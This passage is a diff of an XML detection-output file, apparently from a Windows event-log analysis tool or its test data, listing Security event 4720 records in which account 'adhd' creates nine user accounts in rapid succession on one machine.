-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.7724393Z'/&gt;&lt;EventRecordID&gt;4825&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Stephanie&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1130&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Stephanie&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Stephanie</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4819</recordid>
-            <time>2020-06-11 22:05:03.690567200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.6905672Z'/&gt;&lt;EventRecordID&gt;4819&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jonathan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1129&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jonathan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jonathan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4813</recordid>
-            <time>2020-06-11 22:05:03.594471200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.5944712Z'/&gt;&lt;EventRecordID&gt;4813&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Judith&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1128&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Judith&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Judith</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4807</recordid>
-            <time>2020-06-11 22:05:03.505363700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.5053637Z'/&gt;&lt;EventRecordID&gt;4807&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Christine&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1127&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Christine&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Christine</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4801</recordid>
-            <time>2020-06-11 22:05:03.414115100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.4141151Z'/&gt;&lt;EventRecordID&gt;4801&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kathleen&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1126&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kathleen&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kathleen</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4795</recordid>
-            <time>2020-06-11 22:05:03.331585500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.3315855Z'/&gt;&lt;EventRecordID&gt;4795&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kathy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1125&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kathy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kathy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4789</recordid>
-            <time>2020-06-11 22:05:03.245201100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.2452011Z'/&gt;&lt;EventRecordID&gt;4789&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Anna&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1124&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Anna&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Anna</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4783</recordid>
-            <time>2020-06-11 22:05:03.105209900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.1052099Z'/&gt;&lt;EventRecordID&gt;4783&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Rebecca&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1123&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Rebecca&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Rebecca</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4777</recordid>
-            <time>2020-06-11 22:05:03.21654200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.0216542Z'/&gt;&lt;EventRecordID&gt;4777&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Rachel&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1122&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Rachel&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Rachel</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4771</recordid>
-            <time>2020-06-11 22:05:02.931007000Z</time>
-            <channel>Security</channel>
